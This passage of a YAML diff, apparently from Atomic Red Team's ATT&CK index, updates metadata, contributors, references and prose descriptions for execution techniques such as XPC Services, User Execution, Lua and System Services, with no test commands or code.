+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -25529,7 +25835,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -25545,72 +25851,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -25618,7 +25927,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25633,7 +25946,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -25660,6 +25973,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -25670,15 +25987,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -25695,7 +26016,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -25743,7 +26064,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -25776,12 +26097,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -25842,8 +26162,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -25865,12 +26186,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -25948,14 +26268,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26013,36 +26332,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -26063,25 +26357,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -26110,7 +26489,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26137,30 +26516,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -26177,9 +26538,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -26187,21 +26549,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -26251,28 +26629,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -26283,32 +26644,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26351,12 +26724,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
